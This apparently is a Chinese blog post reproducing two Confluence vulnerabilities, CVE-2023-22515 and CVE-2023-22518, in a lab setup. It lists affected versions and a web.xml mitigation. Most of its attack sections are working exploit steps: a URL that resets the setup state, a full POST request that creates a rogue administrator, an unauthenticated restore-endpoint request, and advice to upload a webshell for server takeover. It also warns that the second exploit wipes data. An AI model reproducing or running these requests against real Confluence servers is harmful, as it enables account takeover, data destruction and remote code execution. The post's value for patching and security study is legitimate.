Confluence 漏洞复现(CVE-2023-22515,CVE-2023-22518)

Confluence 漏洞复现(CVE-2023-22515,CVE-2023-22518)

1.CVE-2023-22515权限提升漏洞

1.1漏洞描述

Confluence近期推出的严重漏洞cve-2023-22515,由于未授权和xwork框架问题,导致攻击者可以未授权将系统设置为未安装完成的状态,然后可以进行管理员账号密码设置。从而登录系统,造成敏感信息泄漏等。

漏洞影响版本:

8.0.0 <= Atlassian Confluence < 8.3.3

8.4.0 <= Atlassian Confluence < 8.4.3

8.5.0 <= Atlassian Confluence < 8.5.2

1.2漏洞环境搭建

官网下载https://www.atlassian.com/software/confluence/download-archives

这里我安装到win10,安装版本选择了atlassian-confluence-8.0.4-x64

注意:需要java环境,mysql数据库,

安装成功后访问:http://192.168.2.129:8090/login.action 可以看到安装成功
在这里插入图片描述

1.3漏洞复现

/server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false

在这里插入图片描述

/setup/setupadministrator-start.action

注意要有Setup is already complete - Confluence字段,没有的点进系统设置管理员

在这里插入图片描述

覆盖 setupComplete 属性,

POST /setup/setupadministrator.action HTTP/1.1
Host: 192.168.2.129:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B4C393494A9F11630749454F8C8EBE86
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Content-Length: 98

username=user&fullName=user&email=1111@qq.comt&password=1111&confirm=1111&setup-next-button=Next

成功绕过,添加管理员,注意要加上X-Atlassian-Token: no-check,否则添加用户不成功

在这里插入图片描述

此时查看系统用户,发现已经存在user用户

在这里插入图片描述

4.漏洞修复

修改 //confluence/WEB-INF/web.xml 文件,并添加以下内容(就在文件末尾的 标签之前):

<security-constraint>
      <web-resource-collection>
        <url-pattern>/setup/*</url-pattern>
      <http-method-omission>*</http-method-omission>
    </web-resource-collection>
      <auth-constraint />
  </security-constraint>

2.CVE-2023-22518远程代码执行漏洞

2.1漏洞描述

在复杂的软件架构中,包的继承和命名空间的使用提供了强大的灵活性,但也带来了潜在的安全风险。当子包继承父包时,它们也继承了父包的接口,但并不总是继承相关的安全控制。在 Confluence 这个案例中,Confluence 滥用了 Struts2 的继承关系,从而导致可以一定程度绕过它自身的权限校验,最终通过部分接口串联利用实现无需认证的远程代码执行。

成功利用这个漏洞的攻击者可以在一定程度上绕过身份验证,而后可以通过串联后台接口,无需认证即可控制并且接管服务器。**需要特别注意的是,该漏洞利用会导致 Confluence 数据清空,对应用数据完整性产生不可逆的影响。**未授权的攻击者利用该漏洞,配合 admin api,可实现远程代码执行,最终控制服务器权限。

2.2漏洞复现

漏洞POC

POST /json/setup-restore.action HTTP/1.1
Host: 192.168.2.129:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=9D2635DE04696EA41660666044100BB2
Connection: close

看到这个页面代表漏洞存在,

在这里插入图片描述

可以看到是未授权访问了备份页面

在这里插入图片描述

3.漏洞利用

结合漏洞利用,进行getshell

通过后台的“管理应用”->“上传应用”功能, 上传一个马上去即可

在这里插入图片描述

本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值